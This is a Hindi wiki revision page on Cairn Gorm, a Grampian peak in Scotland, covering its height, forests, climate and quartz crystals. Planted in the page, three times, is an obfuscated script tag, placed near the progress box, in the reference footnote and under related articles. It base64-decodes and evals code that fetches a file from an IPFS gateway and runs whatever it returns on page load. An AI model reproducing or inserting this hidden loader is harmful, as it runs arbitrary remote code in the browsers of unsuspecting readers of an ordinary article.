Difference between revisions of "केयरन गाँर्म"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*'''केयरन गाँर्म''' स्काटलैंड के ग्रैंपिएन (Grampian) पर्वत...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
*'''केयरन गाँर्म''' स्काटलैंड के ग्रैंपिएन (Grampian) पर्वत की एक चोटी जो बैंफशायर (Banff-shire) तथा इनवरनेस शायर(Enverness-shire) की सीमा पर स्थित है।  
+
*'''केयरन गाँर्म''' [[स्कॉटलैंड]] के '''ग्रैंपिएन (Grampian) पर्वत''' की एक चोटी जो बैंफशायर (Banff-shire) तथा इनवरनेस शायर(Enverness-shire) की सीमा पर स्थित है।  
*बेन नेविस (Ben Nevis) तथा बेन मैकदूई (Ben Maecdhui) को छोड़, यह स्काटलैंड का सबसे बड़ा पर्वत है। इसकी ऊँचाई 4,241 फुट है।  
+
*बेन नेविस (Ben Nevis) तथा बेन मैकदूई (Ben Maecdhui) को छोड़, यह स्काटलैंड का सबसे बड़ा [[पर्वत]] है। इसकी ऊँचाई 4,241 फुट है।  
*इसकी ढाल पर चीड़ (पाइन) के जंगल हैं। यह कठोर ग्रेनाइट चट्टानों से निर्मित होने के कारण अपेक्षाकृत नीचा है।  
+
*इसकी ढाल पर [[चीड़|चीड़ (पाइन)]] के जंगल हैं। यह कठोर ग्रेनाइट चट्टानों से निर्मित होने के कारण अपेक्षाकृत नीचा है।  
*यह शिखर मध्य ग्रैपिएन पर्वत की वृष्टिछाया में पड़ता है जिसके कारण अन्य शिखरों की अपेक्षा यहाँ कम वर्षा होती है।  
+
*यह शिखर मध्य ग्रैपिएन पर्वत की वृष्टिछाया में पड़ता है जिसके कारण अन्य शिखरों की अपेक्षा यहाँ कम [[वर्षा]] होती है।  
*ग्रीष्मकाल में यह ठंढा रहता है।  
+
*[[ग्रीष्म ऋतु|ग्रीष्मकाल]] में यह ठंढा रहता है।  
*यहाँ केयरन गॉर्म नामक भूरे रंग एवं क्वार्ट्‌ज मणिभ (Quartz crystal) पाए जाते हैं जिनका उपयोग आभूषण के रूप में किया जाता है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 3|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=118 |url=}}</ref>  
+
*यहाँ केयरन गॉर्म नामक [[भूरा रंग|भूरे रंग]] एवं क्वार्ट्‌ज मणिभ (Quartz crystal) पाए जाते हैं जिनका उपयोग [[आभूषण]] के रूप में किया जाता है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 3|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=118 |url=}}</ref>  
  
  

Latest revision as of 07:19, 13 January 2020

  • keyaran gaanrm sk aautalaiand ke graianpien (Grampian) parvat ki ek choti jo baianphashayar (Banff-shire) tatha inavaranes shayar(Enverness-shire) ki sima par sthit hai.
  • ben nevis (Ben Nevis) tatha ben maikadooee (Ben Maecdhui) ko chho d, yah skatalaiand ka sabase b da parvat hai. isaki ooanchaee 4,241 phut hai.
  • isaki dhal par chi d (pain) ke jangal haian. yah kathor grenait chattanoan se nirmit hone ke karan apekshakrit nicha hai.
  • yah shikhar madhy graipien parvat ki vrishtichhaya mean p data hai jisake karan any shikharoan ki apeksha yahaan kam varsha hoti hai.
  • grishmakal mean yah thandha rahata hai.
  • yahaan keyaran g aaurm namak bhoore rang evan kvarth‌j manibh (Quartz crystal) pae jate haian jinaka upayog abhooshan ke roop mean kiya jata hai.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 3 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 118 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>